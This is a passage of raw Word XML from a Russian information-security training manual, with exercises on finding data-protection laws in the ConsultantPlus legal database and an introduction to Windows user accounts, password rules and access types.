        <w:t>Доктрина информационной безопасности РФ, утвержденная Указом Президента РФ от 5.12.2016 г., представляет собой совокупность официальных взглядов на цели, задачи,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="248" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>принципы и основные направления обеспечения национальной безопасности РФ в информационной сфере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="2" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="page6"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Для изучения нормативно-правовых основ обеспечения информационной безопасности запустим информационную систему Консультант Плюс и создадим папку с фамилией в разделе «Избранное» с помощью соответствующей кнопки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1010"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2" w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>разделе «Карточка поиска» заполнить следующие поля следующими данными: «Вид документа» – «Федеральный закон»; «Дата» - «01.06.2006 – 31.08.2006» с помощью кнопки «Диапазон дат»; «Название документа» – «О защите информации».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:left="2" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Построить список документов с помощью кнопки «Показать список документов», выбрать документ с именем №149-ФЗ «Об информации…» в последней редакции и открыть его. В тексте документа произвести поиск понятия «Конфиденциальность информации», для чего с помощью кнопки «Найти» заполнить соответствующее поле. Вызвать контекстное меню элемента слева он найденного понятия, выбрать пункт «Добавить в избранное», вкладку «Закладки и документы и нажать кнопку «Добавить». Проверить в разделе «Избранное наличие соответствующей закладки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="2" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Сохранить найденный документ в папку «Фамилия» с помощью последовательности пунктов «Добавить в избранное» – «Папки» – «Фамилия» и проверить наличие документа в папке «Фамилия». Аналогично найти Доктрину информационной безопасности РФ и Федеральный закон «О персональных данных» №152-ФЗ, сохранить их в папку «Фамилия» и поставить закладки для понятий «Персональные данные», «Уничтожение персональных данных» и «Правовые методы обеспечения информационной безопасности». Аналогично найти Федеральные законы «Об электронной подписи» и «О коммерческой тайне", сохранить их в папку «Фамилия» и поставить закладки для нескольких понятий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="7" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>С помощью кнопки «Словарь терминов» заполнить поле «Найти» следующими данными «Электронная цифровая подпись» или «ЭЦП», перейти по ссылке найденного документа и добавить это понятие в закладки, присвоив имя закладке «ЭЦП». Аналогично поставить закладки понятий «Электронное правительство» и «Информационная безопасность организации банковской системы РФ».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="950"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2" w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>разделе «Кодексы» перейти по ссылке «Уголовный кодекс РФ» и произвести поиск статей, касающихся компьютерных преступлений с помощью кнопок «Найти» и «Найти далее», а также экспортировать найденную статью (глава 28) в Microsoft Word с помощью соответствующей кнопки. Аналогично произвести поиск статей, касающихся налоговой тайны, а также экспортировать найденную статью в Microsoft Word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="974"/>
        </w:tabs>
        <w:spacing w:line="261" w:lineRule="auto"/>
        <w:ind w:left="2" w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>разделе «Карточка поиска» в поле «вид документа» ввести «Статья» и построить список документов из трех статей, касающихся обеспечения информационной безопасности,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="182"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="182" w:hanging="182"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>экспортировать в Microsoft Word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="251" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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вопросы по теме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pP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Понятие информатизации</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Этапы развития информационных технологий</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Признаки информационного общества</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Понятие информационного пространства</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Понятие информационной войны и информационной преступности</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Понятие информационной безопасности</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Субъекты и объекты информационной безопасности</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Нормативно-правовые основы информационной безопасности</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Понятие экономической информации</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Перечень сведений конфиденциального характера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-1"/>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задания 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="23" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Используя информационную систему Консультант Плюс, найти и отобразить с добавлением в раздел «Избранное» и экспортом в Microsoft Word:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1240"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="2" w:firstLine="718"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>основные нормативно-правовые акты, регулирующие деятельность в информационной сфере;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="982"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="982" w:hanging="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>определения основных категорий информационной безопасности;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="982"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="982" w:hanging="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>подборку статей по защите информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="982"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="982" w:hanging="262"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="829" w:right="840" w:bottom="480" w:left="1418" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9642"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="page7"/>
      <w:bookmarkStart w:id="5" w:name="_Toc3808610"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:t xml:space="preserve"> 2. Принципы построения системы защиты информации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="28"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Защита информации – это научно организованный систематический процесс планирования и реализации наиболее рациональных и эффективных в современных условиях мероприятий, применения всего комплекса методов и средств, которые гарантируют определенный уровень информационной безопасности, обеспечивают контроль состояния системы защиты информации, своевременное выявление ее уязвимых мест и противоправных действий в отношении объекта защиты.</w:t>
      </w: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Под системой защиты информации понимается система органов, средств, методов, технических, технологических, административных и иных мер и конкретных мероприятий, обеспечивающих защиту информации от внутренних и внешних угроз, безопасность функционирования информационной системы, ее аппаратных и программных средств, связанных с ними информационных ресурсов, коммуникаций и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Существует два принципиальных подхода к обеспечению информационной безопасности: комплексный и фрагментарный. Они базируются на нескольких принципах, носящих общий или специфический характер. К числу общих можно отнести принципы единства, конечной цели, иерархии, связности, модульного построения, развития, функциональности, децентрализации и неопределенности.</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Реализации функций системы защиты информации обеспечивается подсистемам правового, организационного, аппаратного, информационного, программного, математического, лингвистического, нормативно-методического и иного обеспечения.</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Рассмотрим реализацию функций системы защиты информации на примере стандартных средств, доступных пользователям операционной системы Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Учетная запись – это набор данных, который характеризует возможности пользователя по доступу к ресурсам операционной системы, настройке общих, групповых и индивидуальных параметров работы (например, политика сетевой безопасности, темы оформления, фоновые рисунки, общие и индивидуальные папки, файлы, ярлыки и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="250" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Каждый пользователь операционной системы получает доступ к собственной или групповой учетной записи с помощью логина и пароля, который указывается при создании учетной записи. Индивидуальность логина и степень сложности пароля повышают уровень защищенности от несанкционированного доступа (длина пароля не менее 8 символов, комбинированное использование буквенно-цифрового кода, регистров и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>При этом необходимо указать один из типов доступа:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="708"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>административные – полный контроль на ресурсами операционной системы и ее настройками;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="1" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="708"/>
        </w:tabs>
        <w:spacing w:line="243" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ограниченные – отсутствие доступа к определенным настройкам операционной системы, запуску и установке определенного программного обеспечения и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>После создания учетной записи возможно осуществление операций изменения и</w:t>
      </w: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удаления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Создать учетную запись можно используя пункты главного меню операционной системы «Пуск», «Панель управления», «Создание учетной записи». Аналогичную операцию можно произвести с помощью контекстного меню «Мой компьютер», «Управление компьютером», подраздела «Локальные пользователи». В нем имеется две категории:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="5" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="700"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="700" w:hanging="342"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>пользователи, которыми могут быть собственно пользователи операционной системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="58" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
